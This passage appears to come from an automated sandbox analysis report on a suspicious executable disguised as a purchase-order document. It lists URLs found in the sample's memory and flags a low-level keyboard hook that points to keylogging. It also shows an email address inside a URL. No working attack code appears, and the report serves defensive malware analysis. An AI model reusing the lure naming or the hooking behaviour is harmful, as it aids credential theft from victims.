              Source: bhvAF21.tmp.137.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.offi
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeap
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://odc.officeapps.live.com/odc/jsonstrings?g=EmailHrdv2&mkt=1033&hm=2
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.css?b=14512.30550
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.min.js?b=14512.30550
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.min.js?b=16521.30551
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1632306668408
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1685097289379
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp?hm=1&emailAddress=shahak.shapira%40outlook.com&_=168509
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp?hm=2&emailAddress=shahak.shapira%40outlook.com&_=163230
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://open.spotify.com/windows-app-web-link
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://outlookmobile-office365-tas.msedge.net/ab?clientId=512A4435-60B8-42A2-80D3-582B6B7FB6C0&ig=1
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2787436b358dbd81d7fd0a0cccb05788
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f068a709ecd1f0c000b440d901cea9b
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://pagead2.googlesyndication.com/bg/4j6j1KaqOj9dOTqNDUFIq-pj8a-_5PTo96X1Pctm55w.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://pagead2.googlesyndication.com/getconfig/sodar?sv=200&tid=gda&tv=r20210916&st=env
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_csp?id=adbundle&qqi=CPuOuO2wkvMCFQDJuwgdDw4EyQ&gqi=
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/managed/js/adsense/m202109200101/show_ads_impl_with_ama
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/show_ads.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js?domain=ib.adnxs.com&callback=_gfp_s_&client=ca
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js?domain=www.msn.com&callback=_gfp_s_&client=ca-
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://pki.goog/repository/0
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://polyfill.io/v3/polyfill.min.js?features=2CElement.prototype.matches%2CElement.prototype.clos
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://px.ads.linkedin.com/setuid?partner=tripleliftdbredirect&tlUid=13122329571212727769&dbredirec
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/7zPvmktG8JzqA0vnWzpk_g--~A/Zmk9Zml0O3c9NjIyO2g9MzY4O2FwcGlkPWdlbWl
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/10170131.js?ADFassetID=10170131&bv=258
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.png
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpg
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpg
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k4.jpg
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=0.5146119884770144
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://s1.adform.net/stoat/626/s1.adform.net/bootstrap.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://s1.adform.net/stoat/626/s1.adform.net/load/v/0.0.209/e/-gABoCBA/i/vCAv.IAAAAAoAA/r:AdConstru
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://sb.scorecardresearch.com/beacon.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://sectigo.com/CPS0
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259584291.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259001522.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259412881.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259498994.000000000235D000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258841778.000000000235D000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258217273.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258764485.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=4aeddfea844042999a22bdcca1fba378&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=838b780a64e64b0d92d628632c1c377c&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jque
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-d68e7b58/direct
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directi
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-d017f019/directi
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKp8YX.img?h=16&w=16&
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMqFmF.img?h=16&w=16&
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODMk8.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODQmd.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODept.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEFck.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEQ0I.img?h=368&w=62
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4WR.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4Xx.img?h=368&w=62
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFBrV.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFC5q.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=250&w=30
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFE0J.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFENj.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFJFJ.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFLk7.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFWV8.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFhty.img?h=368&w=62
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFsUC.img?h=250&w=30
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFu51.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFy7B.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFyKG.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=250&w=30
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG88s.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGPXq.img?h=194&w=30
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGQtJ.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGV90.img?h=194&w=30
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGapF.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGlbE.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGmTG.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGyYN.img?h=194&w=30
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH2Ml.img?h=194&w=30
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH6xB.img?h=75&w=100
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=6
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&w=27
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&w=27
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&w=27
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ftEY0.img?h=16&w=16
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1gEFcn.img?h=16&w=16
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/css/b5dff51-e7c3b187/kernel-9c
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/js/b5dff51-96897e59/kernel-1e4
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpeg
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/2578937774238713912_2802581922324906360.jpeg
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/6852827437855218848_345419970373613283.jpeg
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-bold.wof
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-regular.
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semibold
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semiligh
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56263802215.000000000236B000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56265110764.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56263755319.0000000002363000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56268247724.000000000236C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56265865320.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56264866952.0000000002B5E000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56268417026.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56265269330.000000000236B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpc.g
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/html5/ssrh.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/in_page_full_auto_V1/Responsive_Monte_GpaSingleIfra
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/abg_lite.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/qs_click_protection.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/window_focus.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://tpc.googlesyndication.com/simgad/14585816484902221120
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://use.typekit.net/ecr2zvs.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000002.56238940466.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.google.com/
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://www.google.com/chrome/
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/https://
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pa
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://www.google.com/pagead/drt/ui
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.msn.com
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.msn.com/
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=ie
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56257688648.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258217273.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56257353168.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drString found in binary or memory: https://www.msn.com/?ocid=iehp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-8
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFl
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/o
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.msn.com/de-ch/homepage/secure/silentpassport?secure=true&lc=2055
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/https://
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/https://www.msn.com/de-c
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp
              Source: bhvAF21.tmp.137.drString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeJump to behavior
